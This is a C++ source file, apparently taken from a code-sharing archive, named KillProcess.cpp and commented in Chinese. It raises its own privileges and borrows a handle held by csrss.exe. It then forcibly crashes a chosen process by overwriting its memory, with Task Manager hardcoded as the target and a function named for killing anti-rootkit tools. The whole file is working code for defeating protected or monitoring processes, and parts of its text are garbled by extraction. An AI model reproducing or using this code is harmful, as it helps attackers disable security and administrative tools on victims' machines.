www.pudn.com > KillProcess.zip > KillProcess.cpp
#include
#include
#include
#include
#pragma comment (lib,"ntdll.lib") // Copy From DDK
#pragma comment (lib,"Kernel32.lib")
#pragma comment (lib,"Advapi32.lib")
#pragma comment(linker, "/ENTRY:main")
#ifndef ULONG_PTR
#define ULONG_PTR unsigned long
#endif
//------------------ 数据类型声明开始 --------------------//
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
ULONG PebBaseAddress;
ULONG_PTR AffinityMask;
LONG BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef enum _SECTION_INHERIT {
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;
typedef struct _MY_PROCESS_INFO {
ULONG PID;
ULONG KPEB;
ULONG CR3;
CHAR Name[16];
ULONG Reserved;
} MY_PROCESS_INFO, *PMY_PROCESS_INFO;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;
typedef long NTSTATUS;
//------------------ 数据类型声明结束 --------------------//
//--------------------- 预定义开始 -----------------------//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS 0x00000000
#define STATUS_UNSUCCESSFUL 0xC0000001
#define STATUS_NOT_IMPLEMENTED 0xC0000002
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_INVALID_PARAMETER 0xC000000D
#define STATUS_ACCESS_DENIED 0xC0000022
#define STATUS_BUFFER_TOO_SMALL 0xC0000023
#define OBJ_KERNEL_HANDLE 0x00000200
#define SystemModuleInformation 11
#define SystemHandleInformation 0x10
#define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; }
//--------------------- 预定义结束 -----------------------//
//------------------ Native API声明开始 ------------------//
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
*/
typedef NTSTATUS (NTAPI* PNtZwQuerySystemInformation) (ULONG, PVOID, ULONG, PULONG);
PNtZwQuerySystemInformation ZwQuerySystemInformation;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId );
*/
typedef NTSTATUS (NTAPI* PNtZwOpenProcess) (OUT PHANDLE, IN ACCESS_MASK, IN POBJECT_ATTRIBUTES,
IN PCLIENT_ID);
PNtZwOpenProcess ZwOpenProcess;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwAllocateVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect );
*/
typedef NTSTATUS (NTAPI* PNtZwAllocateVirtualMemory) (IN HANDLE, IN OUT PVOID,
IN ULONG, IN OUT PULONG,
IN ULONG, IN ULONG);
PNtZwAllocateVirtualMemory ZwAllocateVirtualMemory;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwDuplicateObject(
IN HANDLE SourceProcessHandle,
IN PHANDLE SourceHandle,
IN HANDLE TargetProcessHandle,
OUT PHANDLE TargetHandle,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN BOOLEAN InheritHandle,
IN ULONG Options );*/
typedef NTSTATUS (NTAPI* PNtZwDuplicateObject) ( IN HANDLE, IN PHANDLE, IN HANDLE, OUT PHANDLE,
IN ACCESS_MASK, IN BOOLEAN, IN ULONG);
PNtZwDuplicateObject ZwDuplicateObject;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryInformationProcess(
IN HANDLE ProcessHandle,
IN PVOID ProcessInformationClass,
OUT PVOID ProcessInformation,
IN ULONG ProcessInformationLength,
OUT PULONG ReturnLength );*/
typedef NTSTATUS(NTAPI* PNtZwQueryInformationProcess)(IN HANDLE, IN PVOID, OUT PVOID, IN ULONG, OUT PULONG );
PNtZwQueryInformationProcess ZwQueryInformationProcess;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwProtectVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN OUT PULONG NumberOfBytesToProtect,
IN ULONG NewAccessProtection,
OUT PULONG OldAccessProtection );*/
typedef NTSTATUS (NTAPI* PNtZwProtectVirtualMemory) (IN HANDLE, IN OUT PVOID, IN OUT PULONG, IN ULONG , OUT PULONG);
PNtZwProtectVirtualMemory ZwProtectVirtualMemory;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwWriteVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN ULONG NumberOfBytesToWrite,
OUT PULONG NumberOfBytesWritten OPTIONAL );
*/
typedef NTSTATUS (NTAPI *PNtZwWriteVirtualMemory) ( IN HANDLE, IN PVOID, IN PVOID, IN ULONG, OUT PULONG );
PNtZwWriteVirtualMemory ZwWriteVirtualMemory;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwClose(
IN HANDLE ObjectHandle );
*/
typedef NTSTATUS (NTAPI *PNtZwClose) ( IN HANDLE );
PNtZwClose ZwClose;
/*
NTSYSAPI
NTSTATUS
NTAPI
ZwFreeVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID *BaseAddress,
IN OUT PULONG RegionSize,
IN ULONG FreeType );
*/
typedef NTSTATUS (NTAPI *PNtZwFreeVirtualMemory)( IN HANDLE, IN PVOID, IN OUT PULONG, IN ULONG );
PNtZwFreeVirtualMemory ZwFreeVirtualMemory;
//------------------ Native API声明结束 ------------------//
//------------------ 程序正式开始 ------------------//
DWORD GetPidByName(char *szName)
{
HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
PROCESSENTRY32 pe32={0};
DWORD dwRet=0;
hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)
return 0;
pe32.dwSize = sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap, &pe32))
{
do
{
if(lstrcmpi(szName,pe32.szExeFile)==0)
{
dwRet=pe32.th32ProcessID;
break;
}
} while (Process32Next(hProcessSnap,&pe32));
}
else return 0;
if(hProcessSnap !=INVALID_HANDLE_VALUE)
CloseHandle(hProcessSnap);
return dwRet;
}
void KillIce(ULONG dwProcessId)
{
HMODULE hNTDLL = LoadLibrary ("ntdll");
HANDLE ph, h_dup;
ULONG bytesIO;
PVOID buf;
ULONG i;
CLIENT_ID cid1;
OBJECT_ATTRIBUTES attr;
HANDLE csrss_id;
PROCESS_BASIC_INFORMATION pbi;
PVOID p0, p1;
ULONG sz, oldp;
ULONG NumOfHandle;
PSYSTEM_HANDLE_INFORMATION h_info;
HMODULE hNtDll = ::GetModuleHandle( "ntdll.dll" );
if( hNtDll == NULL ) return ;
// 函数 ++
// ZwQuerySystemInformation
ZwQuerySystemInformation = (PNtZwQuerySystemInformation)GetProcAddress( hNtDll,
"ZwQuerySystemInformation" );
if( ZwQuerySystemInformation == NULL ) return ;
// ZwOpenProcess
ZwOpenProcess = (PNtZwOpenProcess)GetProcAddress( hNtDll,
"ZwOpenProcess" );
if( ZwOpenProcess == NULL ) return ;
// ZwAllocateVirtualMemory
ZwAllocateVirtualMemory = (PNtZwAllocateVirtualMemory)GetProcAddress( hNtDll,
"ZwAllocateVirtualMemory" );
if( ZwAllocateVirtualMemory == NULL ) return ;
// ZwDuplicateObject
ZwDuplicateObject = (PNtZwDuplicateObject)GetProcAddress( hNtDll,
"ZwDuplicateObject" );
if( ZwDuplicateObject == NULL ) return ;
// ZwQueryInformationProcess
ZwQueryInformationProcess = (PNtZwQueryInformationProcess)GetProcAddress( hNtDll,
"ZwQueryInformationProcess" );
if( ZwQueryInformationProcess == NULL ) return ;
// ZwProtectVirtualMemory
ZwProtectVirtualMemory = (PNtZwProtectVirtualMemory)GetProcAddress( hNtDll,
"ZwProtectVirtualMemory" );
if( ZwProtectVirtualMemory == NULL ) return ;
// ZwWriteVirtualMemory
ZwWriteVirtualMemory = (PNtZwWriteVirtualMemory)GetProcAddress( hNtDll,
"ZwWriteVirtualMemory" );
if( ZwWriteVirtualMemory == NULL ) return ;
// ZwClose
ZwClose = (PNtZwClose)GetProcAddress( hNtDll,
"ZwClose" );
if( ZwClose == NULL ) return ;
// ZwFreeVirtualMemory
ZwFreeVirtualMemory = (PNtZwFreeVirtualMemory)GetProcAddress( hNtDll,
"ZwFreeVirtualMemory" );
if( ZwFreeVirtualMemory == NULL ) return ;
// 函数 --
csrss_id = (HANDLE)GetPidByName("csrss.exe");
attr.Length = sizeof(OBJECT_ATTRIBUTES);
attr.RootDirectory = 0;
attr.ObjectName = 0;
attr.Attributes = 0;
attr.SecurityDescriptor = 0;
attr.SecurityQualityOfService = 0;
cid1.UniqueProcess = csrss_id;
cid1.UniqueThread = 0;
ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1);
bytesIO = 0x400000;
buf = 0;
ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);
ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO);
NumOfHandle = (ULONG)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
for (i= 0 ; iProcessId == (ULONG)csrss_id)&&(h_info->ObjectTypeNumber == 5))
{
if (ZwDuplicateObject(ph, (PHANDLE)h_info->Handle, (HANDLE)-1, &h_dup,
0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
if (pbi.UniqueProcessId == dwProcessId)
{
MessageBox(0, "目标已确定!", "OK", MB_OK);
for (i = 0x1000; i<0x80000000; i = i + 0x1000)
{
p0 = (PVOID)i;
p1 = p0;
sz = 0x1000;
if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
{
ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp);
}
}
MessageBox(0, "任务已完成!","OK", 0);
ZwClose(h_dup);
}
}
}
bytesIO = 0;
ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
FreeLibrary(hNTDLL);
}
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
return((GetLastError() == ERROR_SUCCESS));
}
void main()
{
ULONG Pid;
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
if (Pid = GetPidByName("taskmgr.exe"))
{
KillIce(Pid);
}
ExitProcess(0);
}